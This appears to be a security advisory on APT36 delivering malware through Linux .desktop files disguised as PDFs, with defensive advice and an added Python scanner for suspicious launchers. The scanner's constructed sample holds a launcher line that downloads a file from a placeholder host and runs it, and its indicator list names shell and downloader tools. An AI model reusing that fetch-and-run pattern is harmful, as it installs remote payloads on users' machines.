What’s new: The Pakistani APT36 group is abusing Linux .desktop launcher files to deliver malware to government and defense entities in India. Phishing emails carry a .desktop file dressed up as a PDF; when the recipient opens it, the launcher’s Exec= command runs hidden instructions that download and execute the payload, so no software vulnerability is needed, only a user launching the file. The campaign has been active since August 1, 2025 and marks an evolution in APT36’s tradecraft toward more sophisticated and evasive delivery.
Who’s affected
Government and defense organizations in India are the primary targets of these attacks, which aim for data exfiltration and persistent access for espionage purposes.
What to do
- Train users to treat unexpected attachments with suspicion, including files that present as PDFs. On a Linux desktop a .desktop launcher can carry a PDF icon and a .pdf-style name, so the real file extension, not the icon, is what to check.
- Monitor and restrict execution of .desktop files: block or quarantine .desktop attachments at the mail gateway, and on endpoints keep the file-manager default that refuses to launch a .desktop file which is not marked executable or trusted.
- Keep systems patched. Note that this technique does not depend on a software vulnerability; the launcher runs whatever its Exec= line specifies once the user opens it, so patching limits what the downloaded payload can do rather than blocking the initial execution.
- Use endpoint protection that watches for .desktop-driven behaviour: a launcher whose Exec= command spawns a shell or a downloader such as curl or wget, and execution of a freshly downloaded file from a user-writable directory.
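As an added example, not code from the original brief or from any vendor product, the following Python scanner covers the monitoring points in the list above and the lure described at the top: it parses the [Desktop Entry] group of a .desktop file and flags a document-style Name/Icon combined with an Exec= line that invokes a shell or downloader, contains a URL, or chains several commands. The indicator lists, the directories it walks, and the two sample entries are assumptions constructed for illustration and would need tuning before use.

```python
"""Heuristic scanner for suspicious Linux .desktop launchers.

Added example, not code from the original brief. Parses the freedesktop
Desktop Entry format ([Desktop Entry] group of Key=Value lines) and
scores indicators of the lure described above: a launcher that looks
like a PDF whose Exec= line quietly downloads and runs something.
Indicator lists and sample entries are constructed for illustration.
"""
import os
import re

# Assumed indicator lists: tune for your environment.
SHELL_TOOLS = {"bash", "sh", "dash", "zsh", "curl", "wget", "chmod",
               "python", "python3", "base64", "nohup"}
DOCUMENT_SUFFIXES = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")


def parse_desktop_entry(text: str) -> dict:
    """Return Key=Value pairs from the [Desktop Entry] group only."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = (line == "[Desktop Entry]")
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def scan_desktop_entry(text: str) -> list:
    """Return findings for one .desktop file; an empty list means no indicator fired."""
    entry = parse_desktop_entry(text)
    findings = []
    exec_line = entry.get("Exec", "")
    name = entry.get("Name", "")
    icon = entry.get("Icon", "")

    # Lure: the launcher presents itself as a document.
    if name.lower().endswith(DOCUMENT_SUFFIXES) or "pdf" in icon.lower():
        findings.append(f"document lure: Name={name!r} Icon={icon!r}")

    # Exec= invokes a shell or downloader. Words are taken from the whole
    # line, so tools hidden inside a quoted `bash -c "..."` string still count.
    words = set(re.findall(r"[A-Za-z0-9_.+-]+", exec_line))
    hits = sorted(words & SHELL_TOOLS)
    if hits:
        findings.append(f"Exec= invokes shell/downloader tools: {hits}")

    if re.search(r"https?://", exec_line):
        findings.append("Exec= contains a URL (remote payload fetch)")

    # ';', '&', '&&' or '|' in a launcher command means more than one program runs.
    if re.search(r";|&|\|", exec_line):
        terminal = entry.get("Terminal", "false").lower()
        findings.append(f"Exec= chains several commands (Terminal={terminal})")

    return findings


def scan_directory(root: str) -> dict:
    """Scan every *.desktop file under root; returns {path: findings} for files that fired."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.endswith(".desktop"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_desktop_entry(fh.read())
            except OSError:
                continue
            if findings:
                results[path] = findings
    return results


# Constructed sample: mirrors the lure pattern described in the brief.
MALICIOUS_SAMPLE = """[Desktop Entry]
Type=Application
Name=Meeting_Agenda.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://example.invalid/p -o /tmp/.s && chmod +x /tmp/.s && /tmp/.s"
"""

# Constructed sample: an ordinary text-editor launcher.
BENIGN_SAMPLE = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=accessories-text-editor
Exec=gedit %U
Terminal=false
"""

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_desktop_entry(sample) or "no findings")
    # Assumed user-writable locations where a mailed launcher might land.
    for d in ("~/Downloads", "~/Desktop", "~/.local/share/applications", "~/.config/autostart"):
        for path, findings in scan_directory(os.path.expanduser(d)).items():
            print(path, findings)
```

The tool-name check is deliberately coarse: a legitimate launcher that starts an application through python3 or sh will fire it, so treat the output as triage input, and weight the document-lure finding together with a URL or a chained command far higher than any single indicator on its own.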